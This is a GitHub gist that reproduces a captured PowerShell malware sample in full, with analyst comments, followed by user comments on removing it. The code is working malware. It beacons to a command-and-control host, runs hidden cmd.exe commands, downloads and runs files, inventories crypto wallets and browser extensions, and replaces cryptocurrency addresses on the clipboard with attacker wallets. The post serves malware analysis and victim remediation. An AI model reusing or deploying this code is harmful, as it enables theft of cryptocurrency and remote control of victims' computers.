
@infernoboy
Created April 8, 2022 23:39
This script was found in a malicious file that was not being detected by any AV, as reported by VirusTotal.
# --- Analyst annotations (defensive). The code below is reproduced unchanged; only comments were added. ---
# What the visible sample does: a C2 polling loop (main) that can run hidden cmd.exe commands, download-and-run
# files and self-delete; a wallet/extension inventory (FindPaths); window-title watching (FindWindow); and a
# background job that rewrites cryptocurrency addresses found on the clipboard.
# Handle to the running script file; its FullName is used by the "SelfRemove" command path in main.
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
# "major.minor" OS version string; the value "6.1" (Windows 7 / Server 2008 R2) selects the legacy WebClient code paths below.
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
# C2 endpoint over plain HTTP (network IoC). Every beacon and every clipboard-swap report is sent here.
$EndPointURL = "http://api.private-chatting.com/connect";
# Build tag; first field of the fingerprint string that is base64-encoded into the X-User-Agent header.
$__Version__ = "M_37";
# Random name for a named manual-reset event that is shared with the background job (Start-Job near the end of the file).
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
# Created signalled. The C2 response header "worker" == "0" resets it (pausing clipboard swapping); any other value sets it.
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
# Returns the value of the environment variable named $str (wraps the name in %...% and expands it).
# Used below for "temp", "COMPUTERNAME" and "USERNAME".
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}
# Returns property $value of the first instance of WMI class $class.
# If the query yields nothing, or the property is null, a fresh random GUID is returned instead - so values
# derived from this (e.g. the "HWID") are not guaranteed to be stable across runs when the query fails.
function WMI([string] $class, [string] $value) {
$val = $null;
$results = (Get-WmiObject -Class $class) ;
foreach ($item in $results) {
# Only the first instance is consulted.
$val = $item[$value];
break;
}
if ($val -eq $null) {
# Fallback: random identifier rather than an error.
$val = [Guid]::NewGuid().ToString();
}
return $val;
}
# Host identifier sent to the C2: VolumeSerialNumber of the first Win32_LogicalDisk instance
# (random GUID if the query fails - see WMI).
function Get-HWID() {
return (WMI 'win32_logicaldisk' "VolumeSerialNumber")
}
# OS name string (Win32_OperatingSystem.Caption); one field of the fingerprint.
function ik9hXhN11R() {
return (WMI 'Win32_OperatingSystem' "Caption")
}
# Processor address width (Win32_Processor.AddressWidth); one field of the fingerprint.
function P9TEtu77LCNtD() {
return (WMI 'Win32_Processor' "AddressWidth")
}
# Maps a SecurityCenter AntiVirusProduct.productState value to "Enabled" / "Disabled" / "Unknown"
# by inspecting the second byte (bytes[1]) of its byte representation (little-endian on Windows hosts):
#   0x10, 0x11                   -> "Enabled"
#   0x00, 0x01, 0x20, 0x21       -> "Disabled"
#   anything else                -> "Unknown"
function av_enabled([uint32]$state) {
[byte[]] $bytes = [System.BitConverter]::GetBytes($state);
if (($bytes[1] -eq 0x10) -or ($bytes[1] -eq 0x11)) {
return "Enabled";
}
elseif (($bytes[1] -eq 0x00) -or ($bytes[1] -eq 0x01) -or ($bytes[1] -eq 0x20) -or ($bytes[1] -eq 0x21)) {
return "Disabled";
}
return "Unknown";
}
# AV inventory for the fingerprint: queries AntiVirusProduct in the legacy root\SecurityCenter namespace
# and in root\SecurityCenter2, and returns "<displayName> [Enabled|Disabled|Unknown]" entries joined by ", ".
# NOTE(review): a missing namespace only yields a non-terminating error here, but `+=` applied to a single
# non-array WMI object may throw; the main loop's try/catch would swallow that, the top-level Start-Job call
# that also builds the fingerprint would not. TODO confirm on a live host.
function TmBvivf3Wwj8U7NzZh() {
$avs = Get-WmiObject -Namespace "root\SecurityCenter" -Class "AntiVirusProduct";
$avs += Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiVirusProduct";
$avf = New-Object Collections.Generic.List[string];
foreach ($av in $avs) {
$enabled = (av_enabled $av.productState);
$avf.Add($av.displayName + " [$enabled]")
}
return [string]::Join(", ", $avf.ToArray())
}
# Normalises a fingerprint field: removes every "/" and upper-cases the first character.
# Empty input returns "" (avoids the Substring call on an empty string).
function vxUABGtfQ7B7([string]$str) {
if ($str.Length -eq 0) {
return "";
}
$str = $str.Replace("/", "");
return ($str.Substring(0, 1).ToUpper() + $str.Substring(1));
}
# Computed once at load; the same value is reused in every beacon.
$_HWID_ = Get-HWID;
# Builds the host fingerprint that the beacon base64-encodes into the custom X-User-Agent header:
#   "<version>_<hwid>\<ComputerName>\<UserName>\<OS caption> [<address width>]\<AV list>\<base64 wallet inventory>\"
# FindPaths (defined later in the file) supplies the last field. Note the fields are built with the
# normaliser above, so "/" characters never appear inside them.
# Detection: a header named X-User-Agent whose value is base64 of UTF-16LE text (see the beacon function)
# is not something a real browser sends.
function getUserAgent {
return "$($__Version__)_$($_HWID_)\" + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "COMPUTERNAME")) + '\' + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "USERNAME")) + '\' + (vxUABGtfQ7B7 (ik9hXhN11R)) + " [" + (P9TEtu77LCNtD) + "]" + '\' + (vxUABGtfQ7B7 (TmBvivf3Wwj8U7NzZh)) + '\' + (FindPaths) + '\'
}
# C2 beacon. POSTs $data (null/empty in the main loop) to $EndPointURL with the fingerprint in the
# X-User-Agent header (base64 of UTF-16LE) and, when $notify is set, an X-notify header.
# Returns the response body as a string; the response header "worker" drives the shared event:
# "0" resets it (clipboard swapping in the background job pauses), anything else sets it.
function oUjmVhxHJ4Qhrw($data, $notify) {
if ($OS_Major -ne "6.1") {
# Process-wide: force TLS 1.2 and accept any server certificate. The configured endpoint is plain
# HTTP, so the validation callback only matters if the endpoint is switched to HTTPS.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
}
$cli = New-Object System.Net.WebClient;
$useragent = getUserAgent;
$cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($useragent));
if ($notify) {
$cli.Headers['X-notify'] = $notify
}
# Synchronous POST; the body (a command string, see main) is whatever the server answers.
$Response = $cli.UploadString($EndPointURL, $data);
$worker = $cli.ResponseHeaders["worker"];
if ($worker -eq "0") {
$WorkerEn.Reset() | Out-Null;
}
else {
$WorkerEn.Set() | Out-Null;
}
return $Response.ToString()
}
# Downloads $URL to $Filename with a hard-coded desktop-Chrome User-Agent.
# Non-Win7 hosts use Invoke-WebRequest with certificate validation disabled; Win7 hosts use WebClient.
# Called by the "DwnlExe" C2 command, which then executes the downloaded file from %temp% (see main).
function DownloadFile([string]$URL, [string]$Filename) {
[string]$UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/599.99 (KHTML, like Gecko) Chrome/81.0.3999.199 Safari/599.99";
if ($OS_Major -ne "6.1") {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
# $ret is assigned but never read.
$ret = Invoke-WebRequest -Uri $URL -OutFile $Filename -UserAgent $UserAgent -Method 'GET'
}
else {
$cli = New-Object System.Net.WebClient;
$cli.Headers['User-Agent'] = $UserAgent;
$cli.DownloadFile($URL, $Filename);
}
}
# Thin wrapper around DownloadFile; the $wait parameter is accepted but ignored.
function yQM1ybBDSjEP($url, $path, $wait) {
DownloadFile $url $path
}
# "SelfRemove" handler: deletes the script file and, when $quit is true, exits the process.
# $svauXHdYmXwV1whE is not a parameter; it is set inside main (the script's own full path) and is
# visible here through PowerShell's dynamic scoping because this function is only called from main.
function Gn4bSDMHKIxEE8UP7wZJ($quit) {
Remove-Item -Path $svauXHdYmXwV1whE;
if ($quit) {
exit(0);
}
}
# C2 command loop. Once per second: beacon with an empty body, split the response on "|V|" and
# dispatch on the first field:
#   "Cmd"        -> run field[1] through a hidden "cmd.exe /c"
#   "DwnlExe"    -> download field[1] to %temp%\field[2], then run field[3] + that path through a hidden "cmd.exe /c"
#   "SelfRemove" -> delete this script file and exit
# then run FindWindow. Every exception in either step is swallowed.
# Detection: powershell.exe spawning cmd.exe with a hidden window; new files written to %temp% and executed
# shortly after; a POST to the C2 host roughly every second.
function main {
# Field separator used in C2 responses.
$ZFKUuv2t12Af = "|V|";
# "%temp%\" - destination directory for downloaded payloads.
$AuVAfc591z0Yw = (XF3a8JO3r5r8G "temp") + '\';
# Full path of this script; read by the SelfRemove handler via dynamic scoping.
$svauXHdYmXwV1whE = $scriptItem.FullName;
# The next two variables are assigned but not used anywhere in the visible code.
$aWOPoMdm8aLL89 = $scriptItem.Name;
$EwcQB8qBuCScs = "powershell.exe";
while ($true) {
try {
# Beacon without payload; any command arrives in the response body.
[string]$kk9XDcoU8Sfo692 = oUjmVhxHJ4Qhrw;
[string[]] $sep = $ZFKUuv2t12Af;
$Fd1Jal88zKyxij = $kk9XDcoU8Sfo692.Split( $sep, [StringSplitOptions]::None);
# field[0] = command, field[1] = argument (command line or URL); no bounds check on the split result.
$ivI0sA6txn5XPifq = $Fd1Jal88zKyxij[0];
$JkByjqH1xztsW2YUG = $Fd1Jal88zKyxij[1];
if ($ivI0sA6txn5XPifq -eq "Cmd") {
Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $JkByjqH1xztsW2YUG)
}
if ($ivI0sA6txn5XPifq -eq "DwnlExe") {
# field[2] = file name under %temp%, field[3] = command prefix placed before the path.
$path = $AuVAfc591z0Yw + $Fd1Jal88zKyxij[2];
$cmd = $Fd1Jal88zKyxij[3] + $path;
yQM1ybBDSjEP $Fd1Jal88zKyxij[1] $path $true;
Start-Sleep 1
Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $cmd)
}
if ($ivI0sA6txn5XPifq -eq "SelfRemove") {
Gn4bSDMHKIxEE8UP7wZJ $true
}
}
catch {}
try {
FindWindow
}
catch
{}
Start-Sleep 1
}
}
# Inventory of wallet applications and browser wallet extensions that FindPaths tests for.
# Each entry has a "root" (an environment-variable path expanded at runtime) and "targets": the "name"
# reported to the C2 and the "path" joined to the root and checked with Test-Path. The browser entries use
# extension IDs under the Chrome / Brave / Edge default-profile Extensions folders. The JSON is unchanged.
$pathdata =
@'
[
{
"root": "%appdata%",
"targets": [
{
"name": "Exodus-A",
"path": "Exodus"
},
{
"name": "Atomic-A",
"path": "Atomic Wallet"
},
{
"name": "Electrum-A",
"path": "Electrum"
},
{
"name": "Ledger-A",
"path": "Ledger Live"
},
{
"name": "Jaxx-A",
"path": "Jaxx Liberty"
},
{
"name": "com.liberty.jaxx-A",
"path": "com.liberty.jaxx"
},
{
"name": "Guarda-A",
"path": "Guarda"
},
{
"name": "Armory-A",
"path": "Armory"
},
{
"name": "DELTA-A",
"path": "DELTA"
},
{
"name": "TREZOR-A",
"path": "TREZOR Bridge"
},
{
"name": "Bitcoin-A",
"path": "Bitcoin"
},
{
"name": "binance-A",
"path": "binance"
}
]
},
{
"root": "%localappdata%",
"targets": [
{
"name": "Blockstream-A",
"path": "Blockstream Green"
},
{
"name": "Coinomi-A",
"path": "Coinomi"
},
{
"name": "Exodus-A",
"path": "exodus"
},
{
"name": "Docker-A",
"path": "Docker"
}
]
},
{
"root": "%localappdata%\\Google\\Chrome\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-C",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
},
{
"name": "MEWcx-C",
"path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
},
{
"name": "Coin98-C",
"path": "aeachknmefphepccionboohckonoeemg"
},
{
"name": "Binance-C",
"path": "fhbohimaelbohpjbbldcngcnapndodjp"
},
{
"name": "Jaxx-C",
"path": "cjelfplplebdjjenllpjcblmjkfcffne"
},
{
"name": "Coinbase-C",
"path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
}
]
},
{
"root": "%ProgramFiles(x86)%",
"targets": [
{
"name": "Electrum-A",
"path": "Electrum"
}
]
},
{
"root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-B",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
}
]
},
{
"root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-E",
"path": "ejbalbakoplchlghecdalmeeeajnimhm"
}
]
},
{
"root": "%localappdata%\\Programs",
"targets": [
{
"name": "atomic-A",
"path": "atomic"
},
{
"name": "TrezorSuite-A",
"path": "Trezor Suite"
}
]
},
{
"root": "%ProgramFiles%",
"targets": [
{
"name": "Binance-A",
"path": "Binance"
},
{
"name": "BitcoinCore-A",
"path": "Bitcoin"
},
{
"name": "LedgerLive-A",
"path": "Ledger Live"
}
]
},
{
"root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-E",
"path": "ejbalbakoplchlghecdalmeeeajnimhm"
},
{
"name": "Coinomi-E",
"path": "gmcoclageakkbkbbflppkbpjcbkcfedg"
}
]
},
{
"root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-B",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
},
{
"name": "MEWcx-B",
"path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
},
{
"name": "Coin98-B",
"path": "aeachknmefphepccionboohckonoeemg"
},
{
"name": "Binance-B",
"path": "fhbohimaelbohpjbbldcngcnapndodjp"
},
{
"name": "Jaxx-B",
"path": "cjelfplplebdjjenllpjcblmjkfcffne"
},
{
"name": "Coinbase-B",
"path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
}
]
}
]
'@;
# Builds the wallet-inventory field of the fingerprint.
#  1. Looks for a MetaMask Firefox extension (.xpi) under the Firefox profiles folder and records "metamask-F".
#  2. For every $pathdata entry, expands the root and Test-Paths each target; matching target names are recorded.
# Returns the newline-joined names as base64 of their UTF-8 bytes. This is host reconnaissance only
# (presence checks); no wallet data is read here.
function FindPaths {
$a = ConvertFrom-Json $pathdata
$results = New-Object Collections.Generic.List[string];
try {
# Recursive search for any .xpi below the profiles folder; -Force includes hidden items.
$ba = Get-ChildItem -Path "$env:appdata\Mozilla\Firefox\Profiles\*.xpi" -Recurse -Force;
Foreach ($i in $ba) {
# -match is a regex, so the unescaped "." characters match any character.
if ($i.Name -match "ebextension@metamask.io.xpi") {
try {
[string] $ss = "metamask-F"
$results.Add($ss)
}
catch {
# Only reachable if List.Add itself throws.
Write-Host "error"
}
}
}
}
catch {}
foreach ($entry in $a) {
$rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
foreach ($target in $entry.targets) {
if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
$results.Add($target.name)
}
}
}
$ret = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([string]::Join("`n", $results)));
return $ret;
}
# Scans the main-window titles of running processes for exchange / finance keywords and, on a new hit,
# calls log_event - which is not defined anywhere in this listing. A marker file holding the last reported
# keyword is meant to prevent re-reporting the same keyword.
# NOTE(review): the marker path is passed as a literal string to System.IO.File, which does not expand
# "%SystemDrive%" (unlike the script's own ExpandEnvironmentVariables helper), so it is a relative path below
# the current directory. The read very likely throws, the write in the catch very likely throws as well, and
# main's try/catch swallows it - so this routine may never report anything. TODO confirm on a live host.
function FindWindow {
$keywords = @('binance', 'coinbase', 'blockchain', 'voyager', 'blockfi', 'coindesk', 'etoro', 'kucoin', 'citi', 'paxful', 'paypal', 'huobi', 'poloniex', 'bittrex', 'kraken', 'bitfinex', 'bitstamp')
# Every process that currently has a non-empty main window title.
$windows = (Get-Process | Where-Object { $_.MainWindowTitle -ne "" } | Select-Object MainWindowTitle)
foreach ($wndobj in $windows) {
[string]$wnd = $wndobj.MainWindowTitle;
foreach ($keyword in $keywords) {
# Case-insensitive substring match.
if ($wnd.ToLower().Contains($keyword.ToLower())) {
try {
$contentfile = [System.IO.File]::ReadAllText("%SystemDrive%\Users\Public\log.dat").ToLower().replace(' ', '');
# $logsend, $gtr and $datatowrite are assigned but never used.
$logsend = 'newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]").ToLower().replace(' ', '');
if ( $contentfile -eq $keyword.ToLower().replace(' ', '') ) {
$gtr = "";
}
else {
$datatowrite = ('newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]")).ToLower().replace(' ', '');
[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat", $keyword.ToLower().replace(' ', '') );
log_event 'newnewapp' ($keyword.ToLower() + "[" + $wnd.ToLower() + "]");
}
}
catch {
[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat", $keyword.ToLower().replace(' ', '') );
}
}
}
}
}
# Background job (a separate PowerShell process) implementing the clipboard hijacker.
# Receives the C2 URL, the pre-built fingerprint string and the name of the shared pause/resume event.
# Detection / mitigation: a PowerShell process that compiles a User32 P/Invoke class with Add-Type, registers a
# window class with a GUID name, creates a message-only window and calls AddClipboardFormatListener; after each
# swap it POSTs to the C2 with an empty body and an X-notify header. Users should verify a pasted address
# against the source before sending funds; killing the scheduled task / process stops the swapping.
$job1 = Start-Job -ArgumentList $EndPointURL, (getUserAgent), $WorkerEnHandle -ScriptBlock {
param (
[string]
$EndPointURL,
[string]
$UserAgent,
[string]
$WorkerEnHandle
)
# Open the named event created by the parent; if that fails, fall back to a private event that is
# created signalled (so swapping is enabled and the C2 "worker" switch has no effect).
[System.Threading.EventWaitHandle]$WorkerEn = $null;
if ([System.Threading.EventWaitHandle]::TryOpenExisting($WorkerEnHandle, [ref]$WorkerEn) -eq $false) {
$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset);
}
[System.Environment]::CurrentDirectory = $PWD.Path;
#Add-Type -TypeDefinition ([System.IO.File]::ReadAllText('User32.cs'))
# Select the 64-bit framework directory when running as a 64-bit process.
$Framework_Arch = '';
if([System.IntPtr]::Size -eq 8)
{
$Framework_Arch = '64';
}
Add-Type -Path "$env:windir\Microsoft.NET\Framework$Framework_Arch\v4.0.30319\System.Runtime.dll";
Add-Type -Path "$env:windir\Microsoft.NET\Framework$Framework_Arch\v4.0.30319\System.Runtime.InteropServices.dll";
# In-memory C# P/Invoke wrapper for the Win32 window, message-loop and clipboard APIs used below
# (string literal; reproduced unchanged).
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class User32
{
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern ushort RegisterClassEx(ref WNDCLASSEX lpwcx);
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr CreateWindowEx(UInt32 dwExStyle, IntPtr lpClassName, string lpWindowName, UInt32 dwStyle,
Int32 x, Int32 y, Int32 nWidth, Int32 nHeight, IntPtr hWndParent, IntPtr hMenu, IntPtr hInstance, IntPtr lpParam);
[DllImport("user32.dll")]
public static extern int GetMessage(out MSG lpMsg, IntPtr hWnd, uint wMsgFilterMin, uint wMsgFilterMax);
[DllImport("user32.dll")]
public static extern bool TranslateMessage([In] ref MSG lpMsg);
[DllImport("user32.dll")]
public static extern IntPtr DispatchMessage([In] ref MSG lpmsg);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool AddClipboardFormatListener(IntPtr hwnd);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool RemoveClipboardFormatListener(IntPtr hwnd);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WNDCLASSEX
{
[MarshalAs(UnmanagedType.U4)]
public int cbSize;
[MarshalAs(UnmanagedType.U4)]
public int style;
public WNDPROC lpfnWndProc; // not WndProc
public int cbClsExtra;
public int cbWndExtra;
public IntPtr hInstance;
public IntPtr hIcon;
public IntPtr hCursor;
public IntPtr hbrBackground;
public string lpszMenuName;
public string lpszClassName;
public IntPtr hIconSm;
//Use this function to make a new one with cbSize already filled in.
//For example:
//var WndClss = WNDCLASSEX.Build()
public static WNDCLASSEX Build()
{
var nw = new WNDCLASSEX();
nw.cbSize = Marshal.SizeOf(typeof(WNDCLASSEX));
return nw;
}
}
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr DefWindowProcW(IntPtr hWnd, UInt32 msg, UIntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool OpenClipboard(IntPtr hWndNewOwner);
[DllImport("user32.dll")]
public static extern IntPtr GetClipboardData(uint uFormat);
[DllImport("user32.dll")]
public static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);
[DllImport("user32.dll")]
public static extern bool EmptyClipboard();
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalLock(IntPtr hMem);
[DllImport("kernel32.dll")]
public static extern bool GlobalUnlock(IntPtr hMem);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalAlloc(uint uFlags, UIntPtr dwBytes);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalFree(IntPtr hMem);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool CloseClipboard();
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate IntPtr WNDPROC(IntPtr hWnd, uint msg, UIntPtr wParam, IntPtr lParam);
[StructLayout(LayoutKind.Sequential)]
public struct POINT
{
public int X;
public int Y;
}
[StructLayout(LayoutKind.Sequential)]
public struct MSG
{
public IntPtr hwnd;
public uint message;
public UIntPtr wParam;
public IntPtr lParam;
public uint time;
public POINT pt;
public uint lPrivate;
}
}
"@
# Attacker-controlled destination addresses ("a"), one per currency ("c"), each with a regex ("r") that
# recognises a victim address of that format on the clipboard. These addresses are financial IoCs of the sample.
$address_book = ConvertFrom-Json @"
[
{
"a": "bc1qn6ype8u5kgj672mvsez9wz9wt9wk22tzd5vprp",
"r": "^bc1[a-z0-9]{39,59}$",
"c": "BTC"
},
{
"a": "1Pqkb4MZwKzgSNkaX32wMwg95D9NfW9vZX",
"r": "^1[a-km-zA-HJ-NP-Z1-9]{26,33}$",
"c": "BTC"
},
{
"a": "3JvBvRuBfYvB6MjzMornj9EQpxhq9W7vXP",
"r": "^3[a-km-zA-HJ-NP-Z1-9]{26,33}$",
"c": "BTC"
},
{
"a": "qq9yrhef7csy3yzgxgs0rvkvez440mk53gv8ulyu6a",
"r": "^((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}$",
"c": "BCH"
},
{
"a": "bnb1vmwl54jxj9yvsgz33xtyuvqnurdjy2raqnttkq",
"r": "^(bnb)([a-z0-9]{39})$",
"c": "BNB"
},
{
"a": "0x884467182849bA788ba89300e176ebe11624C882",
"r": "^0x[a-fA-F0-9]{40}$",
"c": "ETH"
},
{
"a": "48qx1krgEGzdcSacbmZdioNwXxW6r43yFSJDKPWZb3wsK9pYhajHNyE5FujWo1NxVwEBvGebS7biW9mjMEWdMevqMGmDJ6x",
"r": "^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$",
"c": "XMR"
},
{
"a": "rH6dyKWNpcvFz6fQ4ohyDbevSxcxdxfSmz",
"r": "^r[rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz]{24,34}$",
"c": "XRP"
},
{
"a": "DDxhfK5wbJkRN25mAbBYk3ND4xLjiMRyNq",
"r": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
"c": "DOGE"
},
{
"a": "Xtwj8uGx77NYBUki1UCPvEhe4kHYi6yWng",
"r": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
"c": "DASH"
}
]
"@;
# Writes $text to the clipboard as CF_UNICODETEXT (format 13) from a GMEM_MOVABLE (0x0002) global buffer.
# On success the buffer is owned by the clipboard; on a failed lock it is freed again.
function Set-Clip {
param (
[string]
$text
)
if ($text -eq $null) {
$text = "";
}
# Clipboard text must be NUL-terminated.
$text += [char]0;
[byte[]]$textb = [System.Text.Encoding]::Unicode.GetBytes($text);
$hMem = [User32]::GlobalAlloc(0x0002, [UIntPtr]::new($textb.Length));
if ($hMem -ne 0) {
$tmp = [User32]::GlobalLock($hMem);
if ($tmp -ne 0) {
[System.Runtime.InteropServices.Marshal]::Copy($textb, 0, $tmp, $textb.Length) | Out-Null;
[User32]::GlobalUnlock($hMem) | Out-Null;
[User32]::OpenClipboard([System.IntPtr]::Zero) | Out-Null;
[User32]::EmptyClipboard() | Out-Null; ;
[User32]::SetClipboardData(13, $hMem) | Out-Null;
[User32]::CloseClipboard() | Out-Null;
return;
}
[User32]::GlobalFree($hMem) | Out-Null;
}
}
# Reads CF_UNICODETEXT (format 13) from the clipboard; returns $null when the clipboard cannot be opened
# or holds no text. Note that PtrToStringUni is called on the handle $hMem, not on the locked pointer $tmp.
function Get-Clip {
[string]$text = $null;
if ([User32]::OpenClipboard([System.IntPtr]::Zero) -ne 0) {
$hMem = [User32]::GetClipboardData(13);
if ($hMem -ne 0) {
$tmp = [User32]::GlobalLock($hMem);
if ($tmp -ne 0) {
$text = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($hMem);
[User32]::GlobalUnlock($hMem) | Out-Null;
}
}
[User32]::CloseClipboard() | Out-Null;
}
return $text;
}
# Reports a swap to the C2: empty POST body, the fingerprint in X-User-Agent (base64 of UTF-16LE),
# and the currency / original address / replacement address in X-notify.
function Set-Log([string]$log) {
$cli = New-Object System.Net.WebClient;
$cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($UserAgent));
$cli.Headers['X-notify'] = $log;
$cli.UploadString($EndPointURL, '') | Out-Null;
}
# Clipboard-change handler. Does nothing while the shared event is not signalled (C2 "worker" == "0").
# Otherwise: read the clipboard text, trim it, and for every address-book entry whose regex matches and
# whose address is not already on the clipboard, replace the text with the attacker address and report
# the original. All errors are swallowed.
function Handle_WM_CLIPBOARDUPDATE {
try {
if ($WorkerEn.WaitOne(0) -eq $false) {
return;
}
}
catch {
}
try {
[string]$text = Get-Clip;
if ([string]::IsNullOrEmpty($text)) {
return;
}
$text = $text.Trim();
foreach ($entry in $address_book) {
if (($text -ne $entry.a) -and ($text -match $entry.r)) {
Set-Clip $entry.a
Set-Log ($entry.c + " - " + $text + " - " + $entry.a)
}
}
}
catch {
}
}
# Window procedure: every message is passed to DefWindowProcW; the clipboard message is handled in the pump below.
$wndProc = [User32+WndProc] {
param (
[IntPtr]
$hwnd,
[uint32]
$msg,
[System.UIntPtr]
$wParam,
[IntPtr]
$lParam
)
return [User32]::DefWindowProcW($hwnd, $msg, $wParam, $lParam);
}
# Register a window class with a random (GUID) name and create a message-only window
# (hWndParent = -3 is HWND_MESSAGE), then subscribe to clipboard-change notifications.
$wx = [User32+WNDCLASSEX]::Build();
$wx.lpfnWndProc = $wndProc;
$wx.hInstance = [IntPtr]::Zero;
$wx.lpszClassName = [Guid]::NewGuid().ToString();
[uint16]$atom = [User32]::RegisterClassEx([ref]$wx);
[IntPtr]$hwnd = [User32]::CreateWindowEx(0, [IntPtr]::new($atom), [Guid]::NewGuid().ToString(), 0, 0, 0, 0, 0, [IntPtr]::new(-3), [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);
[User32]::AddClipboardFormatListener($hwnd) | Out-Null;
# Message pump; 0x031D is WM_CLIPBOARDUPDATE. Runs until GetMessage returns 0 or an error.
$msg = [User32+MSG]::new()
while ([User32]::GetMessage([ref]$msg, 0, 0, 0) -gt 0) {
if ($msg.message -eq 0x031D) {
Handle_WM_CLIPBOARDUPDATE;
}
[User32]::TranslateMessage([ref]$msg) | Out-Null;
[User32]::DispatchMessage([ref]$msg) | Out-Null;
}
[User32]::RemoveClipboardFormatListener($hwnd) | Out-Null;
}
# Supervisor loop: re-enters main forever and swallows anything it throws, so the C2 polling only stops
# when the process is terminated or the "SelfRemove" command exits it.
while ($true) {
try {
main
}
catch {
}
}
@p4cm4n97

p4cm4n97 commented Mar 9, 2026

How to remove this malware

  1. Open Task Scheduler
  2. A task was created under Microsoft > Windows > NetService > Network that is spawning PowerShell
  3. You can safely delete the entire NetService folder as it was also created by the malware
  4. Delete a fake log file that it created where it hides the script: C:\Windows\logs\system-logs.txt
  5. It also replaces the contents of C:\Windows\System32\SyncAppvPublishingServer.vbs with its own version. A copy from a clean install of Windows 11 can be found here: https://gist.github.com/infernoboy/7cc1fe26e647dd08e6e63a201cb38e27

That should be all. As for the app you were patching to begin with, in my case it isn't doing anything harmful and runs just fine.

What the malware appears to do

It monitors your clipboard looking for a cryptocurrency address. Once it finds one, it replaces it with its own address in the hopes you do not notice when you paste it. You'd be sending crypto to the malware writer's address if you don't. It also pings a server with some computer identifying information and the original address you wanted to send to. It doesn't look like any personal data is transmitted. I believe that's all it does, so it's not the most harmful thing. The addresses that the malware uses have made over $3m USD!

@NextNext333

Please help: I have a similar problem after trying to install a cracked app. Bitdefender is giving two warnings: "PowerShell tried to load a malicious resource detected as CMD:Heur.BZC.ZFV.Nioc.1.6C085513 and was blocked. Your device is safe." under Antivirus, and "We blocked this dangerous page for your protection:
http://45.156.87.17/task
Accessed by: powershell.exe
Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent." under Infected web resource detected. Please, I need help.

@Officialkarz

Security alerts like this feel stressful. The alert shows Bitdefender worked as expected and blocked a harmful connection.
When software from cracked or untrusted sites runs PowerShell commands and reaches out to unknown IP addresses, the risk is high. Many malware samples act this way: they try to download more code or open a remote channel.
Why the alert appeared
The alert CMD:Heur.BZC comes from Bitdefender Advanced Threat Defense.
This system studies behavior. It does not rely only on known virus signatures.
